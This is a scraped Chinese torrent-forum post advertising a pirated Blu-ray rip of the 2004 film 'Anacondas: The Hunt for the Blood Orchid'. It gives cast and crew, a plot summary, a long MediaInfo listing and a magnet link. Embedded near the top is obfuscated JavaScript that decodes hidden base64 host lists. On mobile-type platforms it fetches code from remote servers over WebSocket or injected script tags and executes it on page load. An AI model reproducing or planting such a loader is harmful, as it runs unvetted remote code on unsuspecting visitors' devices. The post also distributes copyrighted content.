狂蟒之灾2[双语字幕].Anacondas.The.Hunt.for.The.Blood.Orchid.2004.1080p.BluRay.x265.10bit.DTS 6.56GB

版主小s 1月前 237

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x46\x6a\x59\x48\x73\x4f\x52\x52\x45\x59']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9vamxza2pmLm5pYYW5nYYW94aWFuc2hlbmcuYY29t','d3NzOOi8vd3MuaG5qanNoLmNvbTo4MDgwLHdzczovL3dzLnFpbmdsaXh5LmNvbTo4MDgwLHdzczovL3dzLnppb24tbGl2ZXMuY29tOOjgwOODA=',window,document,['Y','O']);}:function(){};

◎译  名 狂蟒之灾2 / 大蟒蛇:血兰花 / 狂蟒之灾2:搜寻血兰 / 大蟒蛇回归
◎片  名 Anacondas: The Hunt for the Blood Orchid
◎年  代 2004
◎产  地 美国
◎类  别 动作 / 惊悚 / 冒险 / 灾难
◎语  言 英语
◎上映日期 2005-02-04(中国大陆) / 2004-08-27(美国)
◎IMDb链接 https://www.imdb.com/title/tt0366174/
◎豆瓣评分 6.4/10 (25325人评价)
◎豆瓣链接 https://movie.douban.com/subject/1308784/
◎片  长 97分钟
◎导  演 德怀特·H·里特 Dwight H. Little (id:1014207)
◎编  剧 汉斯·鲍尔 Hans Bauer (id:1278095)
       小杰克·埃普斯 Jack Epps Jr. (id:1042140)
       迈克尔·迈纳 Michael Miner (id:1292161)
       爱德华·诺麦尔 Edward Neumeier (id:1293076)
       丹尼尔·泽尔曼 Daniel Zelman (id:1018236)
       吉姆·卡什 Jim Cash (id:1014624)
◎演  员 约翰尼·梅辛纳 Johnny Messner (id:1000104)
       卡迪·斯特瑞兰德 KaDee Strickland (id:1036472)
       马修·马斯登 Matthew Marsden (id:1031949)
       尼古拉斯·冈萨雷斯 Nicholas Gonzalez (id:1014054)
       莎莉·理查德森 Salli Richardson (id:1036495)
       尼古拉斯·霍普 Nicholas Hope (id:1096007)
       卡尔·尹 Karl Yune (id:1000414)
       摩里斯·切斯塔特 Morris Chestnut (id:1013859)
       丹尼斯·阿尔恩特 Denis Arndt (id:1032487)
       尤金·伯德 Eugene Byrd (id:1049823)
       安迪·安德森 Andy Anderson (id:1057708)
       Verna Harrah Verna Harrah (id:1286079)
       Nerida Tyson-Chew Nerida Tyson-Chew (id:1299686)
       斯蒂芬·F·温顿 Stephen F. Windon (id:1301075)
       马库斯·达西 Marcus D'Arcy (id:1281686)
       马克·华纳 Mark Warner (id:1300451)
       Jill Eden Jill Eden (id:1282990)
       Terry Ryan Terry Ryan (id:1296390)
       保罗·帕蒂森 Paul Pattison (id:1294106)
       Mark Wareham Mark Wareham (id:1300437)
       Eric Person Eric Person (id:1186521)
       Miles Bellas Miles Bellas (id:1064598)
       Tom Davies Tom Davies (id:1281886)
       Dale Duguid Dale Duguid (id:1282791)
       Steve Cronin Steve Cronin (id:1310091)

◎标  签 惊悚 / 美国 / 恐怖 / 灾难 / 冒险 / 狂蟒之灾 / 美国电影 / 2004

◎简  介
  故事发生在位于婆罗洲的原始丛林中,比尔(约翰尼·梅辛纳 Johnny Messner 饰)带领着他的探险小队穿行于其中,寻找着一种名为“血兰”的珍稀植物。在记载中,血兰拥有着能够使人长生不老的神秘力量,“几乎从未有人获得过它”的传闻也令血兰逐渐成为了传说。这一次,受一家著名的医药公司所托,比尔一行人决定揭开血兰的神秘面纱。                                    
                                在离目标越来越近的同时,危险也不期而至。血兰的力量没有使人类返老还童,却将一群蛇类变得凶猛而恐怖,为了挪动巨大的身体,它们不得不吃下比以往多达数倍的食物,而此时冒昧来访的人类,成为了它们最好的猎物。一边是丛林中恶劣的生态环境,一边是穷凶极恶的食人恶兽,同伴们一个接着一个的悲惨死去,比尔最终能够自保,并且挽救更多的生命吗?

  1. ##### MediaInfo ######

  2. General

  3. Unique ID                                : 6246827167838864041958618292864738512 (0x4B3185BC005D8B9703BB4286E68E4D0)

  4. Complete name                            : Anacondas.The.H[email protected]BBQDDQ.COM.mkv

  5. Format                                   : Matroska

  6. Format version                           : Version 4

  7. File size                                : 6.56 GiB

  8. Duration                                 : 1 h 36 min

  9. Overall bit rate                         : 9 708 kb/s

  10. Movie name                               : Anacondas.The.Hunt.for.The.Blood.Orchid

  11. Encoded date                             : UTC 2021-08-21 05:35:33

  12. Writing application                      : mkvmerge v51.0.0 ('I Wish') 64-bit

  13. Writing library                          : libebml v1.4.0 + libmatroska v1.6.2


  14. Video

  15. ID                                       : 1

  16. Format                                   : HEVC

  17. Format/Info                              : High Efficiency Video Coding

  18. Format profile                           : Main [email protected]@Main

  19. Codec ID                                 : V_MPEGH/ISO/HEVC

  20. Duration                                 : 1 h 36 min

  21. Bit rate                                 : 8 114 kb/s

  22. Width                                    : 1 920 pixels

  23. Height                                   : 800 pixels

  24. Display aspect ratio                     : 2.40:1

  25. Frame rate mode                          : Constant

  26. Frame rate                               : 23.976 (24000/1001/53354) FPS

  27. Color space                              : YUV

  28. Chroma subsampling                       : 4:2:0

  29. Bit depth                                : 10 bits

  30. Bits/(Pixel*Frame)                       : 0.220

  31. Stream size                              : 5.48 GiB (84%)

  32. Writing library                          : x265 3.4+1-g07e3381df+31:[Windows][GCC 10.1.0][64 bit] Yuuki 10bit+8bit+12bit

  33. Encoding settings                        : rc=crf / crf=20.5000 / qcomp=0.65 / qpstep=4 / stats-write=0 / stats-read=0 / no-lossless / no-cu-lossless / aq-mode=3 / aq-strength=0.70 / cbqpoffs=0 / crqpoffs=0 / ipratio=1.40 / pbratio=1.30 / psy-rd=2.00 / psy-rdoq=0.00 / deblock=0:0 / ref=6 / limit-refs=1 / no-limit-modes / bframes=8 / b-adapt=2 / bframe-bias=0 / b-pyramid / b-intra / weightp / weightb / min-keyint=24 / max-keyint=240 / rc-lookahead=24 / gop-lookahead=0 / NTMzNTQ=uuDQuD2mJt9fsCf / scenecut=40 / hist-scenecut=0 / radl=0 / max-cu-size=64 / min-cu-size=8 / me=3 / subme=7 / merange=48 / rdoq-level=0 / rd=4 / rdpenalty=0 / dynamic-rd=0.00 / no-rd-refine / ----- / cutree / sao / no-rect / no-amp / no-open-gop / wpp / no-pmode / no-pme / no-psnr / no-ssim / nr-intra=0 / nr-inter=0 / no-constrained-intra / no-strong-intra-smoothing / max-tu-size=32 / tu-inter-depth=1 / tu-intra-depth=1 / limit-tu=0 / qg-size=32 / qpmax=69 / qpmin=0 / ----- / cpuid=533541111039 / frame-threads=3 / numa-pools=+ / log-level=2 / input-csp=1 / input-res=1920x800 / interlace=0 / level-idc=0 / high-tier=1 / uhd-bd=0 / no-allow-non-conformance / no-repeat-headers / aud / no-hrd / info / hash=0 / no-temporal-layers / lookahead-slices=0 / no-splice / no-intra-refresh / no-ssim-rd / signhide / no-tskip / max-merge=3 / temporal-mvp / no-frame-dup / no-hme / no-analyze-src-pics / no-sao-non-deblock / selective-sao=4 / early-skip / rskip / no-fast-intra / no-tskip-fast / no-splitrd-skip / zone-count=0 / no-strict-cbr / no-rc-grain / no-const-vbv / sar=0 / overscan=0 / videoformat=5 / range=0 / colorprim=2 / transfer=2 / colormatrix=2 / chromaloc=0 / display-window=0 / cll=0,0 / min-luma=0 / max-luma=1023 / log2-max-poc-lsb=8 / vui-timing-info / vui-hrd-info / slices=1 / no-opt-qp-pps / no-opt-ref-list-length-pps / no-multi-pass-opt-rps / scenecut-bias=0.05 / hist-threshold=0.01 / no-opt-cu-delta-qp / no-aq-motion / no-hdr10 / no-hdr10-opt / no-dhdr10-opt / no-idr-recovery-sei / analysis-reuse-level=0 / analysis-save-reuse-level=0 / analysis-load-reuse-level=0 / scale-factor=0 / refine-intra=0 / refine-inter=0 / refine-mv=1 / refine-ctu-distortion=0 / no-limit-sao / ctu-info=0 / no-lowpass-dct / refine-analysis-type=0 / copy-pic=1 / max-ausize-factor=1.0 / no-dynamic-refine / no-single-sei / no-hevc-aq / no-svt / no-field / qp-adaptation-range=1.00 / no-scenecut-aware-qpconformance-window-offsets / right=0 / bottom=0 / NTMzNTQ= / decoder-max-rate=0

  34. Default                                  : Yes

  35. Forced                                   : No


  36. Audio

  37. ID                                       : 2

  38. ID in the original source medium         : 4352 (0x1100)

  39. Format                                   : DTS

  40. Format/Info                              : Digital Theater Systems

  41. Codec ID                                 : A_DTS

  42. Duration                                 : 1 h 36 min

  43. Bit rate mode                            : Constant

  44. Bit rate                                 : 1 509 kb/s

  45. Channel(s)                               : 6 channels

  46. Channel layout                           : C L R Ls Rs LFE

  47. Sampling rate                            : 48.0 kHz

  48. Frame rate                               : 93.750 FPS (512 SPF)

  49. Bit depth                                : 24 bits

  50. Compression mode                         : Lossy

  51. Stream size                              : 1.02 GiB (16%)

  52. Language                                 : English

  53. Default                                  : Yes

  54. Forced                                   : No

  55. Original source medium                   : Blu-ray


  56. Text #1

  57. ID                                       : 3

  58. ID in the original source medium         : 4609 (0x1201)

  59. Format                                   : PGS

  60. Muxing mode                              : zlib

  61. Codec ID                                 : S_HDMV/PGS

  62. Codec ID/Info                            : Picture based subtitle format used on BDs/HD-DVDs

  63. Duration                                 : 1 h 31 min

  64. Bit rate                                 : 37.8 kb/s

  65. Count of elements                        : 2032

  66. Stream size                              : 24.9 MiB (0%)

  67. Title                                    : chs&eng

  68. Language                                 : Chinese

  69. Default                                  : Yes

  70. Forced                                   : No

  71. Original source medium                   : Blu-ray


  72. Text #2

  73. ID                                       : 4

  74. ID in the original source medium         : 4610 (0x1202)

  75. Format                                   : PGS

  76. Muxing mode                              : zlib

  77. Codec ID                                 : S_HDMV/PGS

  78. Codec ID/Info                            : Picture based subtitle format used on BDs/HD-DVDs

  79. Duration                                 : 1 h 31 min

  80. Bit rate                                 : 38.0 kb/s

  81. Count of elements                        : 2032

  82. Stream size                              : 25.0 MiB (0%)

  83. Title                                    : cht&eng

  84. Language                                 : Chinese

  85. Default                                  : No

  86. Forced                                   : No

  87. Original source medium                   : Blu-ray


  88. Text #3

  89. ID                                       : 5

  90. ID in the original source medium         : 4611 (0x1203)

  91. Format                                   : PGS

  92. Muxing mode                              : zlib

  93. Codec ID                                 : S_HDMV/PGS

  94. Codec ID/Info                            : Picture based subtitle format used on BDs/HD-DVDs

  95. Duration                                 : 1 h 31 min

  96. Bit rate                                 : 20.1 kb/s

  97. Count of elements                        : 2032

  98. Stream size                              : 13.2 MiB (0%)

  99. Title                                    : chs

  100. Language                                 : Chinese

  101. Default                                  : No

  102. Forced                                   : No

  103. Original source medium                   : Blu-ray


  104. Text #4

  105. ID                                       : 6

  106. ID in the original source medium         : 4612 (0x1204)

  107. Format                                   : PGS

  108. Muxing mode                              : zlib

  109. Codec ID                                 : S_HDMV/PGS

  110. Codec ID/Info                            : Picture based subtitle format used on BDs/HD-DVDs

  111. Duration                                 : 1 h 31 min

  112. Bit rate                                 : 20.4 kb/s

  113. Count of elements                        : 2032

  114. Stream size                              : 13.4 MiB (0%)

  115. Title                                    : cht

  116. Language                                 : Chinese

  117. Default                                  : No

  118. Forced                                   : No

  119. Original source medium                   : Blu-ray


  120. Text #5

  121. ID                                       : 7

  122. ID in the original source medium         : 4608 (0x1200)

  123. Format                                   : PGS

  124. Muxing mode                              : zlib

  125. Codec ID                                 : S_HDMV/PGS

  126. Codec ID/Info                            : Picture based subtitle format used on BDs/HD-DVDs

  127. Duration                                 : 1 h 34 min

  128. Bit rate                                 : 51.0 kb/s

  129. Count of elements                        : 3154

  130. Stream size                              : 34.5 MiB (1%)

  131. Title                                    : eng

  132. Language                                 : English

  133. Default                                  : No

  134. Forced                                   : No

  135. Original source medium                   : Blu-ray


  136. Menu

  137. 00:00:00.000                             : en:第 01 章

  138. 00:03:25.622                             : en:第 02 章

  139. 00:09:44.125                             : en:第 03 章

  140. 00:16:58.559                             : en:第 04 章

  141. 00:24:06.194                             : en:第 05 章

  142. 00:30:04.302                             : en:第 06 章

  143. 00:35:57.405                             : en:第 07 章

  144. 00:42:15.366                             : en:第 08 章

  145. 00:49:59.329                             : en:第 09 章

  146. 00:56:43.274                             : en:第 10 章

  147. 01:04:27.697                             : en:第 11 章

  148. 01:10:13.000                             : en:第 12 章

  149. 01:18:29.204                             : en:第 13 章

  150. 01:22:38.453                             : en:第 14 章

  151. 01:25:50.061                             : en:第 15 章

  152. 01:32:07.480                             : en:第 16 章



TAGS 动作 冒险 惊悚 灾难

磁力链:
  • magnet:?xt=urn:btih:E661CC46B3FEB7A6FF25D11878EEE0660D8E1A3C
上传的附件:

BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。

最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回